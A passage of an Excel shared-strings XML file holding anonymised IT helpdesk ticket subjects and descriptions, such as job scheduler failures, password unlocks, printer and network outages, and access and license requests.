    <t>ubdihsop ahyeqpmx</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_2599 failed in job_scheduler at: 09/01/2016 01:30:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_2599 failed in job_scheduler at: 09/01/2016 01:30:00</t>
  </si>
  <si>
    <t>list of it team functions with names</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: kflqpite.gbeoqsnc@gmail.com
hello gso team,
can you forward us the list of it team members â€“ grouped by their function?
example
team members
it function
solution
competrhyrncy
support
erp- supply_chain
srinfhyath
vijeghtyundra
shwhdbthyuiethadri
sanhjtyhru kurtyar 
windows server
active directory
security - erp
security - non-erp
</t>
  </si>
  <si>
    <t>engineering_drawing_tool issue</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: dwsyaqpr.bzasnmvw@gmail.com_x000D_
_x000D_
hi,_x000D_
_x000D_
engineering_drawing_tool is not working in my system. please give me solution in this issue._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>edi process for miro entries-urgent</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: neokfwiy.ufriscym@gmail.com_x000D_
_x000D_
dear it,_x000D_
_x000D_
please help to check  and post the outstanding miro entries  company 5321, we have created &amp; customer inwarehouse_tools yesterday, but the miro entries for interco ap have not been posted yet._x000D_
_x000D_
please help to post the entries immediately before 12:00 today._x000D_
_x000D_
[cid:image002.png@01d20444.161e7df0]_x000D_
_x000D_
best </t>
  </si>
  <si>
    <t xml:space="preserve">unable to take print out from engineering_drawing_tool 2006 </t>
  </si>
  <si>
    <t>unable to take print out from engineering_drawing_tool 2006.</t>
  </si>
  <si>
    <t>pofkwlui joteryma</t>
  </si>
  <si>
    <t xml:space="preserve">job hr_payroll_na_u1 failed in job_scheduler at: 08/31/2016 23:00:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job hr_payroll_na_u1 failed in job_scheduler at: 08/31/2016 23:00:00</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_2551 failed in job_scheduler at: 08/31/2016 23:00:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_2551 failed in job_scheduler at: 08/31/2016 23:00:00</t>
  </si>
  <si>
    <t xml:space="preserve">job hr_payroll_na_u2 failed in job_scheduler at: 08/31/2016 23:00:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job hr_payroll_na_u2 failed in job_scheduler at: 08/31/2016 23:00:00</t>
  </si>
  <si>
    <t xml:space="preserve">job hr_payroll_na_u6 failed in job_scheduler at: 08/31/2016 23:00:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job hr_payroll_na_u6 failed in job_scheduler at: 08/31/2016 23:00:00</t>
  </si>
  <si>
    <t>mii uacyltoe hxgaycze from lacw8515941 : step 'refresh page' failed: element 'span' was not found since 09:18 pm et on 08/31.</t>
  </si>
  <si>
    <t>mii is not working. error user authentication failed</t>
  </si>
  <si>
    <t>mii is not working. error user authentication failed._x000D_
_x000D_
erp is working, internet is working._x000D_
_x000D_
whole plant is not able to access the system.</t>
  </si>
  <si>
    <t>byfskuni mhvnqodk</t>
  </si>
  <si>
    <t>cannot view the drawing in mii</t>
  </si>
  <si>
    <t>cannot view the drawings attached to material 6216122 in SID_34.   i checked and the version of the nxd drawing is 00.   this material also exists in SID_1 with the same value.</t>
  </si>
  <si>
    <t xml:space="preserve">shop floor server issues </t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: vciknubg.wdlkabms@gmail.com_x000D_
_x000D_
request assistance with our shop floor system.  all users are unable to log in an scan orders on the floor.   a previous call was placed to open a trouble ticket._x000D_
_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_3028 failed in job_scheduler at: 08/31/2016 22:02:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_3028 failed in job_scheduler at: 08/31/2016 22:02:00</t>
  </si>
  <si>
    <t>when employees try to log into mii, get the following error. user authentication failed</t>
  </si>
  <si>
    <t>not able to scan orders in the usa plant</t>
  </si>
  <si>
    <t>xdswhrif ludsxncq</t>
  </si>
  <si>
    <t>password locked</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: cuytdmhv.yeqdmwvt@gmail.com
hello
please unlock my password for erp and net weaver.
user id: kimufghtyry
</t>
  </si>
  <si>
    <t>configair server responds with " 500   internal server error" in case of any other logon language then "en".</t>
  </si>
  <si>
    <t>configair server responds with " 500   internal server error" in case of any other logon language then "en" and the model "mill_model" is used. the issue exists in erp erp system SID_34 as well as on distributor_tool / company center - production environment.._x000D_
further error message text is "  error: while trying to invoke the method java.util.list.iterator() of a null object loaded from local variable 'locallist'"._x000D_
logon language "en" is ok. if our "csscdrill" model is used all language seem to be working fine. but once the user changes to any other language (e.g. de or it) and uses the model mill_model the configig air system responses with the error message during starting process of configair configurator.</t>
  </si>
  <si>
    <t xml:space="preserve">HostName_1045:windows disk space utilization alert - on e:\ free space less than 15% and under 5gb free. </t>
  </si>
  <si>
    <t xml:space="preserve">HostName_1045:(reporting_engineering_tooling - production):windows disk space utilization alert - on e:\ free space less than 15% and under 5gb free. </t>
  </si>
  <si>
    <t>analysis for microsoft excel access (erp business intelligence)</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: zolnubvq.ehrqifxp@gmail.com
please install analysis for microsoft excel on xrqnyzhb oblghuyf and kvwrbfet jrhoqdix's computer.
ashley employee number is 6656817
vic lonn employee number is 211566061
best </t>
  </si>
  <si>
    <t xml:space="preserve">job Job_2881 failed in job_scheduler at: 08/31/2016 18:20:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_2881 failed in job_scheduler at: 08/31/2016 18:20:00</t>
  </si>
  <si>
    <t>ess site sales and markhtyeting tab missing.</t>
  </si>
  <si>
    <t>hpakdzyj lkrtvosz</t>
  </si>
  <si>
    <t>interface: fastethernet0/27 vlan 51: lhqwx402189sf on company-na-usa-usa-switch-cl04-3-2960-access-sw03.company.com is down</t>
  </si>
  <si>
    <t>interface: fastethernet0/27 Â· vlan 51: lhqwx402189sf on company-na-usa-usa-switch-cl04-3-2960-access-sw03.company.com is down</t>
  </si>
  <si>
    <t>wifi not working, stuck on yet no networks shown, wont turn off. ony mobile broadband works</t>
  </si>
  <si>
    <t>name:todghtyud usa
language:
browser:microsoft internet explorer
email:todd.usa@company.com
customer number:
telephone:734-
summary:wifi not working, stuck on yet no networks shown, wont turn off. ony mobile broadband works</t>
  </si>
  <si>
    <t xml:space="preserve">reg: warehouse_tool communication tickets </t>
  </si>
  <si>
    <t xml:space="preserve">
received from: jvhqyamt.wodzrcjg@gmail.com
hello gso team,
please assign any critical warehouse_tool tickets to network team after my office hours and inform them.
network ops team should be able to resolve the issues and if they need any support intern they will contact me.
with best </t>
  </si>
  <si>
    <t>in the work center to do list production orders with crtd are showing up - they should not</t>
  </si>
  <si>
    <t xml:space="preserve">in the work center to do list production orders with crtd are showing up - they should not - please look at work center 10000 in plant_3_x000D_
stefdgthyo, kahrthyeui, and vinhytry discussed, the hana model is not filtering this information out.  we need to add a filter in mii.  </t>
  </si>
  <si>
    <t>need added to printer address book \\HostName_1033\tc91</t>
  </si>
  <si>
    <t xml:space="preserve">ic
 welcome, our next available agent will be with you shortly...
 interaction alerting agent.
 website visitor has joined the conversation
rakthyesh ramdntythanjesh
 hi danghtnuell
fbhyeksq caexmols
 hello rakthyesh
rakthyesh ramdntythanjesh
 </t>
  </si>
  <si>
    <t>phone numbers for usa canada customer service team are not working, impacting all our customers for australia canada.</t>
  </si>
  <si>
    <t>the global_telecom_1 numbers that are not work are;
calls to these numbers get a recording stating "if you like to make a call please hang up and try again."</t>
  </si>
  <si>
    <t>flyqjavm knlzewqs</t>
  </si>
  <si>
    <t>ticket update on inplant_856223</t>
  </si>
  <si>
    <t>time format needs to be changed to 24 hours.</t>
  </si>
  <si>
    <t>time format needs to be changed to 24 hours.
computer name: awyw8328926,awyw8911727-plant_5404,awyw8911434-bnsh0504,awyw8911479-awysinic3
-connected to the user system using teamviewer.
-contact :079
-connected to the pc using rdp.
-added the user to the admin group.
-restarted all  the pc's.
-help the user change the time zone on all the pc's.
-issue resolved.</t>
  </si>
  <si>
    <t>nrbgctwm kfwdhrmt</t>
  </si>
  <si>
    <t>activity 4 and 5 efficiency too high reported for usa</t>
  </si>
  <si>
    <t>note from omufjcxr ahypftjx - _x000D_
_x000D_
"do you know if the data in the activity 4 column of the work center efficiency report is accurate? for august it is showing very high efficiency, then when i check an order, the cost isn't very far off."_x000D_
_x000D_
"activity 5 also looks strange in the report â€“ for the tipset work center it isn't pulling the correct planned pieces. everything in erp looks good when i pull up the orders â€“ just the report seems to have bad data."</t>
  </si>
  <si>
    <t>windows password reset for jogt harrhntyl</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_3194 failed in job_scheduler at: 08/31/2016 14:15:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_3194 failed in job_scheduler at: 08/31/2016 14:15:00</t>
  </si>
  <si>
    <t>vip 1 fax machine with phone number 724- is not working and does not have a dial tone.</t>
  </si>
  <si>
    <t>fax machine with phone number 724- is not working and does not have a dial tone.</t>
  </si>
  <si>
    <t>i need access to the deleted folder on collaboration_platform.</t>
  </si>
  <si>
    <t>i can't find a mti certificate tracking form on collaboration_platform and need to make sure it wasn't deleted.</t>
  </si>
  <si>
    <t xml:space="preserve">please reset password to telephony_software. </t>
  </si>
  <si>
    <t>collaboration_platform site not launching.</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: xlvuhjea.mjugvtnd@gmail.com_x000D_
_x000D_
dear it help desk = i am unable to navigate out via internet explorer to places like collaboration_platform or purchasing.  also, skype will not open for me, and i can't see other people's availability on outlook or skype.  please help_x000D_
yes, i've tried logging off and on, and removing the battery_x000D_
no, i haven't recently changed my homepage, but yes, i did recently change my password using password_management_tool.  let me know of any questions.  </t>
  </si>
  <si>
    <t>xlvuhjea mjugvtnd</t>
  </si>
  <si>
    <t>unable to connect to knowledge center in commstorage_product tab</t>
  </si>
  <si>
    <t>iscl collaboration_platform sites seem to be down</t>
  </si>
  <si>
    <t xml:space="preserve">i have tried accessing several bookmarkhtys i have within the "iscl realm of collaboration_platform." looks like i cannot access anything there. other people from our team are having the same issues. </t>
  </si>
  <si>
    <t>unable to upload file on collaboration_platform</t>
  </si>
  <si>
    <t>domain account locked out</t>
  </si>
  <si>
    <t>issues to log into ethics course</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: fmzdkyqv.dbrslnhe@gmail.com_x000D_
_x000D_
hi_x000D_
i receive the following error message when trying to log into the current ethics module â€“ might have to do with chaof primarily used e-mail to fmzdkyqv.dbrslnhe@gmail.com&lt;mailto:fmzdkyqv.dbrslnhe@gmail.com&gt; â€“ please check and correct â€“ </t>
  </si>
  <si>
    <t>operator forgot login password. qgwypesz fzsdnmrk user id:zemboks  61227</t>
  </si>
  <si>
    <t xml:space="preserve">ic_x000D_
 welcome, our next available agent will be with you shortly..._x000D_
 interaction alerting agent._x000D_
 website visitor has joined the conversation_x000D_
rakthyesh ramdntythanjesh_x000D_
 hi robhyertyj_x000D_
 </t>
  </si>
  <si>
    <t>xkisaybg fykpoxhu</t>
  </si>
  <si>
    <t>ticket update on ticket_no0431842</t>
  </si>
  <si>
    <t xml:space="preserve">call from vitalyst : ms crm dynamics issue </t>
  </si>
  <si>
    <t>call from vitalyst : ms crm dynamics issue 
contact : 2813</t>
  </si>
  <si>
    <t>trying to sign on to purchasing system, but the website will not even load.</t>
  </si>
  <si>
    <t xml:space="preserve">soflex - dnc is not working.  </t>
  </si>
  <si>
    <t xml:space="preserve"> soflex - dnc is not working.  unable to connect to datenbank. server HostName_754 should be restarted.
phone:  49 </t>
  </si>
  <si>
    <t>bad monitor - lbdw7402361</t>
  </si>
  <si>
    <t>bad monitor - lbdw8513472 - near rob ripple</t>
  </si>
  <si>
    <t>bad monitor lbdw7402359</t>
  </si>
  <si>
    <t>bad monitor lbdw8513460 - near braze line</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_1918c failed in job_scheduler at: 08/31/2016 12:00:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_1918c failed in job_scheduler at: 08/31/2016 12:00:00</t>
  </si>
  <si>
    <t xml:space="preserve">supply_chain_software signin </t>
  </si>
  <si>
    <t xml:space="preserve">
received from: oetlgbfw.bsctrnwp@gmail.com
my password is not working
please reset my password
username matghyuthdw
</t>
  </si>
  <si>
    <t>bad monitor lbdw7402365</t>
  </si>
  <si>
    <t>unable to connect to printer</t>
  </si>
  <si>
    <t>i am unable to connect to my printer and print things_x000D_
when i try to print, it says drivers need updated, but if i go to install the drivers i get an error anyways</t>
  </si>
  <si>
    <t>kzejoucl imfbsokl</t>
  </si>
  <si>
    <t>access to bw production SID_37 in erp</t>
  </si>
  <si>
    <t>i can log into bex via the web but it is asking for id and password.  i would need access to usa (plant_137), usa (plant_33), usa (plant_92)</t>
  </si>
  <si>
    <t>fmvdulec jvcfdxem</t>
  </si>
  <si>
    <t>HostName_106:volume consumed on : c:\ is more than 85% .</t>
  </si>
  <si>
    <t>consultant needs collaboration_platform access</t>
  </si>
  <si>
    <t xml:space="preserve">consultant, ycimqxdn wtubpdsz, requires collaboration_platform access, the same as nkqafhod xbvghozp.  both users are from schneider downs._x000D_
_x000D_
please refer to inc1543039, submitted on august 22nd (and ticket # ticket_no1541640)._x000D_
_x000D_
this is needed as soon as possible, as ycimqxdn wtubpdsz has started his engagement.  if he already has access, please provide the credentials he should use for his license._x000D_
_x000D_
please contact me with any questions._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>the hr_tool portal for finance returns an error when trying to run reports</t>
  </si>
  <si>
    <t>byclpwmv esafrtbh is unable to login to ticketing_tool.</t>
  </si>
  <si>
    <t>problem with badge printer.</t>
  </si>
  <si>
    <t>epjwqaru mikoszpv</t>
  </si>
  <si>
    <t>logging into mii supervisor dashbankrd results in error pop-up.. 'internal server error'</t>
  </si>
  <si>
    <t>logging into mii supervisor dashbankrd results in error pop-up.. 'internal server error'. user is a member of mii operator and mii supervisor group in ad.
phone; :234-</t>
  </si>
  <si>
    <t>rechner ewew8323546; ewew8323545  neu erzeugen</t>
  </si>
  <si>
    <t xml:space="preserve">vip 2 : printer not working </t>
  </si>
  <si>
    <t>vip 2 : printer not working _x000D_
_x000D_
driver update prompt</t>
  </si>
  <si>
    <t>issues with mic and screen shatryung on skype</t>
  </si>
  <si>
    <t>when connected to telekom (mobile broadband), the vpn does not work.</t>
  </si>
  <si>
    <t xml:space="preserve">when connected to telekom (mobile broadband), the vpn does not work._x000D_
error : page can not be displayed._x000D_
vpn works fine with wlan._x000D_
</t>
  </si>
  <si>
    <t>rftnxoau cwolhfyv</t>
  </si>
  <si>
    <t>please forward emails to new address.</t>
  </si>
  <si>
    <t>user mexkspfc nocpyxaz
her old email address is no longer valid.  it has to stay valid
autoforward it to her new one
her old one is susfhtyan.malfhklouicki@company.com</t>
  </si>
  <si>
    <t>vrbdqjwk uwxmbztl</t>
  </si>
  <si>
    <t>ebhsm004 :volume consumed on c:\ is more than 85%.</t>
  </si>
  <si>
    <t xml:space="preserve">analysis for office is not working </t>
  </si>
  <si>
    <t>analysis for office is not working</t>
  </si>
  <si>
    <t>skype issue</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: zfburidj.jmilguev@gmail.com_x000D_
_x000D_
hi there,_x000D_
_x000D_
i cannot sign into skype and i have an important meeting i need to get on to this morning._x000D_
_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">not able to call telephony_software number of  germany former germany location </t>
  </si>
  <si>
    <t xml:space="preserve">when try to call telephony_software number of  germany former germany location (ex. 20445175 or 20455271) we could not hear each others.
i can her them, they can hear me but we cannot communicate each others.
i did a uacyltoe hxgaycze with other locations, ex. france 20666152 or uk 20500000 and it works normally.
</t>
  </si>
  <si>
    <t xml:space="preserve"> ughzilfm cfibdamq called to check if the account are active</t>
  </si>
  <si>
    <t xml:space="preserve">outlook not working: freezing </t>
  </si>
  <si>
    <t>erp running slow</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: rtpmlwnk.unpambrv@gmail.com_x000D_
_x000D_
hi,_x000D_
_x000D_
erp is running estorage_productly slow.  i am at the usa, il reconditioning plant.  with today being the last day of the month, it is imperative that we enter as many orders as possible.  can you please look at this?_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>unable to print labels.</t>
  </si>
  <si>
    <t>no connection between the workstation and the server uxhq010. normal printing works. unable to print labels._x000D_
_x000D_
works fine on win 7 systems. issue is only with xp systems._x000D_
_x000D_
printer: wezeb02. it is a barcode printer.</t>
  </si>
  <si>
    <t>the e-time system is not working.  the plant controllers are receiving an error message, whenever we try to run a rpt.</t>
  </si>
  <si>
    <t>please review the attached document, in order to view the error message.  i can be reached on my cell at 615-or my office 615</t>
  </si>
  <si>
    <t xml:space="preserve">share collaboration_platform site </t>
  </si>
  <si>
    <t xml:space="preserve">
[â€Ž8/â€Ž31/â€Ž2016 1:03 pm] 
hi 
matheywt rovfghesntine or me are unable to share the global recruiting team site with anyone. please advise.
</t>
  </si>
  <si>
    <t>mm 7154294 - transfer pricing</t>
  </si>
  <si>
    <t xml:space="preserve">mm 7154294 has an average customer net price (vk13 - ztfn) for 1101 of 20.60 per pc.  in october 2015 the price was per pak.  why did the price switch from per pak to per pc?  i would think that the price of this material should be 20.60 per pak and 2.06 per pc since it is a pack of 10.  it is imperative that we fix this issue immediately as we have a short time framdntye to fix the transfer price and avoid overpaying customs duties.  please advise.  </t>
  </si>
  <si>
    <t>cisco access point is not working._x000D_
mac address : 1819db8e64</t>
  </si>
  <si>
    <t>sbtvploj mwtrouyl</t>
  </si>
  <si>
    <t>change o365 license fron s1 to k1</t>
  </si>
  <si>
    <t xml:space="preserve">could you please changes the o365 license of the following employees from "s1" to "k1"
luifdsts olhryhira - 300 1000
cost center pam001
cordrtegd 31544571 hlcrbuqa qznjshwm hlcrbuqa.qznjshwm@gmail.com
costarra         31505504 vtdygauw wqxcrzhj alex.costa@company.com
santodde1          31544416 tlvwusmh dbwuyxoq eder.santrtos@company.com
santossdm1 31542346 ojtmnpxc klacwufr ojtmnpxc.klacwufr@gmail.com
coutidfrc 3155574 cesarrogerio coutinho vetqkwpn.qajtdobg@gmail.com
santosdfd 31545621 delsonpereira santrtos delsonpereira.santrtos@company.com
santoes2 31565653 kgyboafv tlzsrvgw kgyboafv.tlzsrvgw@gmail.com
serravdsa 31564500 vagnerlrtopes eeserra vagnerlrtopes.eeserra@company.com
</t>
  </si>
  <si>
    <t>gvtbduyf gdblxiva</t>
  </si>
  <si>
    <t>error message for hana and not able to open file to run quote file that i need.</t>
  </si>
  <si>
    <t>phone 812.  when open up erp analysis for microsoft excel i get error. the error shows following message: "the launcher is exited with error. see log file for more detail. the analysis add-in is not registered correctly"</t>
  </si>
  <si>
    <t>issues with company ebusiness mailbox</t>
  </si>
  <si>
    <t>hr_tool access</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: umzcxfah.aoshpjiu@gmail.com_x000D_
_x000D_
good morning,_x000D_
i am unable to run any reports in hr_tool today. it worked fine yesterday._x000D_
_x000D_
please advise._x000D_
</t>
  </si>
  <si>
    <t>ahbwvjct sfonkwra</t>
  </si>
  <si>
    <t>change date settings-citrix-multiple users</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: iltcxkvw.dkwmxcgn@gmail.com
hello team,
i'm writing to you as a request to change the date, for a couple of citrix users, from eastern time (us&amp;canada) to eet(eastern european time).
users for which the date should be changed from eastern time (us&amp;canada) to eet(eastern european time):
Â·         vrtvpopc
Â·         vvrnrtacri
Â·         vvrtgffada
Â·         vvrurtgsur
Â·         vvrtyjakaa
Â·         vvrtymitrd
Â·         vvdeftmea
Â·         vvbgrtyeleb
Â·         vvcodgtjud
Â·         vvggrthhibg
could you please be so kind to perform the changes and let us know is additional information is required from our side?
</t>
  </si>
  <si>
    <t>sgaczfvo wxmkrzfu</t>
  </si>
  <si>
    <t>no audio during meetings</t>
  </si>
  <si>
    <t>no audio during meetings, also, mic doesn't work</t>
  </si>
  <si>
    <t>missing folder in outlook</t>
  </si>
  <si>
    <t xml:space="preserve">unable to get the skype add-in </t>
  </si>
  <si>
    <t xml:space="preserve">company logo is still on the printed erp qualtiy certificates </t>
  </si>
  <si>
    <t xml:space="preserve">hello, _x000D_
_x000D_
please see attached document and e-mail with mynfoicj riuvxdas. _x000D_
when we print out the certificate via vl02n, still the company logo is on the document. _x000D_
_x000D_
we got repeat trouble with custom, deliveries are stopped etc. _x000D_
_x000D_
</t>
  </si>
  <si>
    <t>ticket update on inc1546812 from dslamtcb ezbmonjr</t>
  </si>
  <si>
    <t>circuit outage:germany-1- (company):20 mbps link to global_telecom_1 mpls circuit is down since at 8:00 am et on 08/31.site have backup.</t>
  </si>
  <si>
    <t>what type of outage:  _____network     __x___circuit     _____power (please specify what type of outage)_x000D_
_x000D_
1. top 23 cert site   ?    ____yes_____     (yes/no/na) _x000D_
_x000D_
2. when did it start  ?   _____8:00 am et on 08/31_________________x000D_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____global_telecom_1 # 000000221254416. _____________________       _x000D_
_x000D_
12. notified  gsc  ________     (yes/no/na)    cert started  ?________    (yes/no/na) _x000D_
_x000D_
13.  additional diagnostics</t>
  </si>
  <si>
    <t>printer co16 is not printing.</t>
  </si>
  <si>
    <t>printer co16 is not printing.
server : \\HostName_813
error : update driver.
contact : 812</t>
  </si>
  <si>
    <t>wgmtckef atgmfybs</t>
  </si>
  <si>
    <t>query from qdapolnv jlcavxgi</t>
  </si>
  <si>
    <t>lentidÃ£o da mÃ¡quina</t>
  </si>
  <si>
    <t>favor verificar a lentidÃ£o da minha mÃ¡quina, estÃ¡ fora do normal, mesmo sendo final de mÃªs.</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: mnxbeuso.rfmdlwuo@gmail.com_x000D_
_x000D_
team â€“_x000D_
_x000D_
please find basis weekend/weekday(night) on-call schedule and shift schedule as per attachment. this excel is in the below location in the collaboration_platform. you can save the below link so that you can use this link to find on-call/shift persons and will keep updating the excel with the details as and when required._x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>please provide full access to \\HostName_768\rtr\kcompany</t>
  </si>
  <si>
    <t>srmuqpna wtlvbxmc</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: ebkfwhgt.flapokym@gmail.com
hello,
s.venkbghksh â€“i no-200535 ,login id :sv1 is locked.pl arrange to unlock the same immediately.
pghjkanijkraj.s.s
</t>
  </si>
  <si>
    <t>ebkfwhgt flapokym</t>
  </si>
  <si>
    <t xml:space="preserve">browser issue </t>
  </si>
  <si>
    <t>i cannot access company collaboration_platform to sign into hr_tool</t>
  </si>
  <si>
    <t>can not start netweaver</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: wsimcqzt.xvwzbdhq@gmail.com_x000D_
_x000D_
hello,_x000D_
during to start netweaver, system require net framdntywork 4.5._x000D_
could you please add that on my pc._x000D_
_x000D_
[cid:image001.png@01d2038f.0a3ad480]_x000D_
_x000D_
_x000D_
_x000D_
mit freundlichen grugermany / with best </t>
  </si>
  <si>
    <t>istallation of programdntymes into the new cpu</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: yxliakph.soucfnqe@gmail.com_x000D_
_x000D_
we've raised a afe for a new spindle uacyltoe hxgayczerig, wherein this cpu &amp; monitors are to be installed, we are sending the same to you for necessary installation of programdntymes like windows 9 operating system._x000D_
request you to do the same by tomorrow._x000D_
best  </t>
  </si>
  <si>
    <t>xjmpacye qgxrptnf cannot send delivery notes via zz_mails</t>
  </si>
  <si>
    <t xml:space="preserve">dear it team, _x000D_
my colleague cannot send herself pdfÂ´s out of erp via zz_mails. _x000D_
the problem already exists since some days. _x000D_
she already looged off an on from erp and windows, but it stil does not work. _x000D_
can you please have a look?_x000D_
</t>
  </si>
  <si>
    <t>xjmpacye qgxrptnf</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</si>
  <si>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(ex hq50 â€“ wy98 - hp 8150)       hr 17     plus  hr 14_x000D_
 _x000D_
   â€¢  detailed description of the problem ?  i am receiving an error message window box that states:   install driver.  when i click to install, it appears that it is working, however, i then get another message that states:  the document could not be printed_x000D_
_x000D_
   â€¢  type of documents not printing?  (email â€“ excel â€“ wordâ€¦etc)   all _x000D_
      (inwarehouse_tool â€“ delivery note â€“ production orderâ€¦etc)_x000D_
_x000D_
   â€¢  what system or application being used at time of the problem?      (ex windows / erp /kls)   _x000D_
_x000D_
   â€¢  if not printing at all, does it respond to a ping command on the network and has a power cycle of the printer been completed?_x000D_
_x000D_
   â€¢  if erp system, which system?   (ex SID_34 / SID_38 / hrp / plm)_x000D_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</si>
  <si>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gljrdmnu yfnbkcmp</t>
  </si>
  <si>
    <t>multiple shop floor employees getting locked out of mii in usa ohio</t>
  </si>
  <si>
    <t xml:space="preserve">please help unlock the accounts of the following employees
they are currently unable to log into mii and record production / value add
1) keghn zanegtyla : clock# 6654525
2) pfxwuvce hcbmiqdp : clock# 6656800
</t>
  </si>
  <si>
    <t>need access to my drive (please check her account)</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: ybhazlqp.zfghsxiw@gmail.com_x000D_
_x000D_
hallo it team,_x000D_
_x000D_
wie verbinde ich mich zu meinen netzlaufwerk, â€žapptc"?_x000D_
der zugang ist seit gestern weg._x000D_
_x000D_
danke und gruÃŸ,_x000D_
ybhazlqp zfghsxiw_x000D_
_x000D_
_x000D_
[cid:image001.png@01d2038b.SID_41fdaf0]_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>ybhazlqp zfghsxiw</t>
  </si>
  <si>
    <t>additional corrections of  sales org 1278 and company address/phone numbers required after germany move</t>
  </si>
  <si>
    <t>1. sales organisation address 1278 â€“ phone number and fax number need to be reversed to original phone/fax number from fÃ¼rth.  0911â€¦_x000D_
2. plant address plant_124 â€“ phone /fax numbers need to be adjusted to show germany central phone numbers/fax_x000D_
3. company code address of 5278 need to be reverted back! address is in fÃ¼rth not in germany_x000D_
_x000D_
details are attached to the ticket.</t>
  </si>
  <si>
    <t>setup outlook  \ wareneingang \vzqomdgt jwoqbuml</t>
  </si>
  <si>
    <t>outlook not accepting password : outlook 2010</t>
  </si>
  <si>
    <t>szhljtcx rtmxlegk</t>
  </si>
  <si>
    <t>.rar file query</t>
  </si>
  <si>
    <t xml:space="preserve">ad password reset </t>
  </si>
  <si>
    <t>erp problem! - SID_34 - unable to delete customer from personal value list</t>
  </si>
  <si>
    <t xml:space="preserve">user "ripfghscp" has accidently added one customer to her personal value list. 
now the customer shows up in every sales document as "default" not allowing to search for different customers.
please check and provide a short tutorial how to solve this problem. 
daily work is heavily influenced!
</t>
  </si>
  <si>
    <t>gkxsnaty ibeawmjt</t>
  </si>
  <si>
    <t>network outage:barcelona - tesscenter 1:site is hard down since at 5:44 am et on 08/31.no backup on site.</t>
  </si>
  <si>
    <t>what type of outage:  __x___network     _____circuit     _____power (please specify what type of outage)_x000D_
_x000D_
1. top 23 cert site   ?    ____yes_____     (yes/no/na) _x000D_
_x000D_
2. when did it start  ?   ____5:44 am et on 08/31__________________x000D_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_na_____    (yes/no/na) _x000D_
_x000D_
6. backup circuit active ?   __na______     (yes/no/na) _x000D_
_x000D_
7. site contact notified (phone/email) ?  ___email______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</si>
  <si>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edit user is not working </t>
  </si>
  <si>
    <t>edit user hangs forever in the user admin management screen and unable to submit the user assignments.</t>
  </si>
  <si>
    <t>access required</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: hjkyqecw.ixdsbwoz@gmail.com_x000D_
_x000D_
pl provided access to folder with all rights   \\HostName_95\mtdesign\company machine manuals&lt;file:///\\HostName_95\mtdesign\company%20machine%20manuals&gt;._x000D_
_x000D_
with best </t>
  </si>
  <si>
    <t>hjkyqecw ixdsbwoz</t>
  </si>
  <si>
    <t>my sysetem remote access</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: utgszjrf.pacfvxzk@gmail.com_x000D_
_x000D_
dear sir,_x000D_
my system is cant able remote access so me look into that .awyw8328084_x000D_
_x000D_
with </t>
  </si>
  <si>
    <t>utgszjrf pacfvxzk</t>
  </si>
  <si>
    <t>request for solid works viewer in wrench_engineering_tool</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: xnzfsmue.kwsazpeu@gmail.com_x000D_
_x000D_
kindly provide the solid work viewer in wrench_engineering_tool to my computer,_x000D_
comp name:awyw8911785_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>xnzfsmue kwsazpeu</t>
  </si>
  <si>
    <t>call from third party to talk to it head to present themselves</t>
  </si>
  <si>
    <t>windows user id</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: ilbkhgxd.hirsqytd@gmail.com
help desk
please provide the windows user id to below user.
user id : gb3ytu
name : g bfghabu
</t>
  </si>
  <si>
    <t xml:space="preserve">wifi is not working </t>
  </si>
  <si>
    <t>can not access to skpye for business</t>
  </si>
  <si>
    <t>contact phone:497 or 18621, can not access to skpye for business, user name or password wrong</t>
  </si>
  <si>
    <t>reaktivieren alte laptop hr. mghllenbecfnfk \bctypmjw cbhnxafz</t>
  </si>
  <si>
